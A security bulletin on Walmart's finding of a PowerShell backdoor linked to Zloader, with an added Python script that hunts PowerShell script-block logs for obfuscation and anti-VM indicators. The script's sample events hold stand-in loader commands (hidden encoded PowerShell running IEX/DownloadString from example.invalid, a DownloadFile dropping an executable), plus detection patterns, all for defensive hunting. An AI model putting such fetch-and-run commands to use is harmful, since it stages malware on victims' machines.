Walmart Discovers New PowerShell Backdoor Linked to Zloader Malware

Summary:
Walmart’s Cyber Intelligence Team has discovered a previously unknown PowerShell backdoor alongside a new variant of the Zloader/SilentNight malware. The backdoor is designed to give the actors further access by performing reconnaissance on the infected host and deploying additional malware. Researchers note that it shares similarities with a previously observed PowerShell malware called PowerDash, particularly in the way both build the system profile that is sent to the command and control (C2) infrastructure and in their use of the same obfuscation techniques to hide the more important components of the backdoor. At the time of writing, only a few samples of the newly discovered backdoor are available on VirusTotal, so there is little material for building signatures and detection is correspondingly harder.

Security Officer Comments:
PowerShell scripts are commonly used by threat actors because they run under a trusted, signed Microsoft interpreter, can be obfuscated cheaply, and can download and execute further malware without dropping a conventional binary to disk. Notably, Walmart's threat intelligence team found heavily obfuscated code sections in the new backdoor, which they extracted and analyzed. One of these code blobs was an anti-virtual-machine check, designed to stop the sample from running in the sandboxes and VMs that researchers use for analysis. A second block prepares the collected system information for transmission to the C2 server and handles the commands the server issues in response.
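
As an added illustration (not code from Walmart's write-up or from the malware itself), the following Python scores PowerShell script-block log entries (event ID 4104, written when Script Block Logging is enabled) for the kind of layering described above: a thin outer command whose anti-VM check and downloader only become visible after decoding the embedded base64. The indicator patterns, threshold, host names and sample events are all constructed assumptions for the example, not artifacts of the Walmart samples.

```python
"""Hunt for obfuscated and anti-VM PowerShell in script-block logs.

Windows writes each script block the engine compiles to
Microsoft-Windows-PowerShell/Operational event ID 4104 when Script Block
Logging is enabled. This scores those blocks against a few indicators and
decodes embedded base64 layers, because the interesting content (anti-VM
checks, downloaders, C2 handling) usually sits one encoding step below the
text that reaches the log. Indicators and sample events are constructed for
illustration; none is taken from the Walmart samples.
"""
import base64
import re

# (name, pattern, weight). Heuristic, not signatures for any particular family.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(nc(odedcommand)?|c)?\s+[A-Za-z0-9+/=]{40,}", re.I), 3),
    ("from_base64", re.compile(r"FromBase64String", re.I), 2),
    ("char_arith", re.compile(r"\[char\]\s*\(?\d+", re.I), 2),
    ("iex", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2),
    ("download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 2),
    ("vm_check", re.compile(r"Win32_ComputerSystem|Win32_BIOS|VMware|VirtualBox|VBOX|QEMU", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
]
THRESHOLD = 5  # one indicator alone (an admin querying Win32_ComputerSystem) is not enough
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _looks_like_text(s):
    """Accept a decoding only if it is mostly printable ASCII. This rejects a
    UTF-16LE payload read as UTF-8 (NUL bytes) and a UTF-8 payload read as
    UTF-16LE (CJK garbage)."""
    if not s:
        return False
    printable = sum(1 for c in s if 32 <= ord(c) < 127 or c in "\r\n\t")
    return printable / len(s) >= 0.9


def decode_embedded_base64(block):
    """Return the plaintext of every long base64 run in the block. PowerShell's
    -EncodedCommand carries UTF-16LE; FromBase64String payloads are usually UTF-8."""
    found = []
    for m in B64_RUN.finditer(block):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(text):
                found.append(text)
                break
    return found


def score_block(block, depth=0, max_depth=3):
    """Return (score, hits) for one script block. Recurses into decoded base64
    layers and prefixes those hits with 'decoded:' so the analyst can see which
    indicators were hidden behind an encoding step."""
    hits = {name: weight for name, rx, weight in INDICATORS if rx.search(block)}
    if depth < max_depth:
        for inner in decode_embedded_base64(block):
            _, inner_hits = score_block(inner, depth + 1, max_depth)
            for name, weight in inner_hits.items():
                hits.setdefault("decoded:" + name, weight)
    return sum(hits.values()), hits


def hunt(events):
    """Return (host, score, sorted hit names) for every 4104 event at or above THRESHOLD."""
    flagged = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        score, hits = score_block(ev["script"])
        if score >= THRESHOLD:
            flagged.append((ev["host"], score, sorted(hits)))
    return flagged


def _enc(script):
    """Encode a script the way 'powershell -enc' expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry). Two are routine admin activity;
# two have the shape of a staged loader whose anti-VM check and downloader only
# appear after decoding. example.invalid is a reserved, non-resolving domain.
_STAGE = ("$m=(Get-CimInstance Win32_ComputerSystem).Manufacturer;"
          "if($m -match 'VMware|VirtualBox'){exit};"
          "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')")
_DROP = base64.b64encode(
    b"(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','C:/Users/Public/a.exe')"
).decode("ascii")

SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "WS-0001",
     "script": "Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }"},
    {"event_id": 4104, "host": "SRV-0003",
     "script": "Get-CimInstance Win32_ComputerSystem | Select-Object Manufacturer, Model"},
    {"event_id": 4104, "host": "WS-0042",
     "script": "powershell.exe -nop -w hidden -enc " + _enc(_STAGE)},
    {"event_id": 4104, "host": "WS-0017",
     "script": "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + _DROP + "')))"},
]

if __name__ == "__main__":
    for host, score, hits in hunt(SAMPLE_EVENTS):
        print(f"{host}: score={score} hits={', '.join(hits)}")
```

The recursion is the point: the outer command on WS-0042 only shows an encoded command and a hidden window, while the anti-VM query and the downloader surface as `decoded:` hits. The threshold keeps a lone `Win32_ComputerSystem` query from an administrator below the alerting line; tune weights and threshold against your own baseline before relying on it.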

While Walmart itself was not targeted in the latest campaign, the company noted that the new PowerShell backdoor was potentially used in attacks alongside Zloader, a modular banking trojan turned malware loader that has been linked over the years to a number of Russian ransomware operations, including Ryuk, DarkSide and Black Basta.

Suggested Corrections:
The distribution method for the new PowerShell backdoor was not disclosed. In the past, similar malware such as PowerDash has been delivered through malspam carrying malicious .doc attachments; those documents attempted to exploit CVE-2017-0199, a relatively old Microsoft Office/WordPad remote code execution vulnerability, to run the first stage of the infection. To reduce exposure to similar campaigns, organizations should keep Office and Windows patched against known vulnerabilities such as CVE-2017-0199, train users not to open links or attachments from unknown senders, run endpoint protection that inspects PowerShell activity, and enable PowerShell Script Block Logging so that obfuscated stages can be recovered from the logs during investigation.

Link(s):
https://www.infosecurity-magazine.com/news/walmart-powershell-backdoor-zloader/